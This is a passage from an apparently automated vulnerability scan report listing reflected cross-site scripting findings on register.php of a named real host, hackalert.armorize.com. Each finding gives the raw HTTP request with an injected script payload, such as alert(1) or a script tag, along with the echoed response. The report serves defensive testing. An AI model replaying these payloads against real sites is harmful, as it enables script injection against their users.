Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/cross.pnga26f4"-alert(1)-"aa027df5bd4?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.196. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fc10%3balert(1)//b61f4f2ef54 was submitted in the REST URL parameter 5. This input was echoed as 5fc10;alert(1)//b61f4f2ef54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png5fc10%3balert(1)//b61f4f2ef54 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:25:11 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/cross.png5fc10;alert(1)//b61f4f2ef54?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.197. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8159"><script>alert(1)</script>899067cda44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/c8159"><script>alert(1)</script>899067cda44/images/icons/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:16 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/c8159"><script>alert(1)</script>899067cda44/images/icons/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.198. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b447%3balert(1)//d0b28f8b6f8 was submitted in the REST URL parameter 2. This input was echoed as 2b447;alert(1)//d0b28f8b6f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C2b447%3balert(1)//d0b28f8b6f8/images/icons/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:47 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<2b447;alert(1)//d0b28f8b6f8/images/icons/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.199. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f7c9"-alert(1)-"1ebd3a6d5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C8f7c9"-alert(1)-"1ebd3a6d5b/images/icons/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:00 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<8f7c9"-alert(1)-"1ebd3a6d5b/images/icons/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.200. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2de41"-alert(1)-"48785f170f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images2de41"-alert(1)-"48785f170f9/icons/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:09 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images2de41"-alert(1)-"48785f170f9/icons/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.201. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 85f38%3balert(1)//fa6b927070e was submitted in the REST URL parameter 3. This input was echoed as 85f38;alert(1)//fa6b927070e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images85f38%3balert(1)//fa6b927070e/icons/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:52 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images85f38;alert(1)//fa6b927070e/icons/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.202. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba565"-alert(1)-"8c0ac875e43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/iconsba565"-alert(1)-"8c0ac875e43/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:21:06 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/iconsba565"-alert(1)-"8c0ac875e43/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.203. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5414d%3balert(1)//c7beb553e0c was submitted in the REST URL parameter 4. This input was echoed as 5414d;alert(1)//c7beb553e0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons5414d%3balert(1)//c7beb553e0c/exclamation.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:21:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons5414d;alert(1)//c7beb553e0c/exclamation.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.204. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90972"-alert(1)-"31082f01fc3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png90972"-alert(1)-"31082f01fc3 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:23:37 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/exclamation.png90972"-alert(1)-"31082f01fc3?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.205. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 21caf%3balert(1)//f62b4c6ef0b was submitted in the REST URL parameter 5. This input was echoed as 21caf;alert(1)//f62b4c6ef0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png21caf%3balert(1)//f62b4c6ef0b HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:25:01 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/exclamation.png21caf;alert(1)//f62b4c6ef0b?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.206. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ff1"-alert(1)-"35ac958f42a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C95ff1"-alert(1)-"35ac958f42a/images/icons/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:00 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<95ff1"-alert(1)-"35ac958f42a/images/icons/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.207. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dba1"><script>alert(1)</script>0b6a973ea52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/7dba1"><script>alert(1)</script>0b6a973ea52/images/icons/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:29 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/7dba1"><script>alert(1)</script>0b6a973ea52/images/icons/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.208. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3aa99%3balert(1)//3e00e5c246a was submitted in the REST URL parameter 2. This input was echoed as 3aa99;alert(1)//3e00e5c246a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

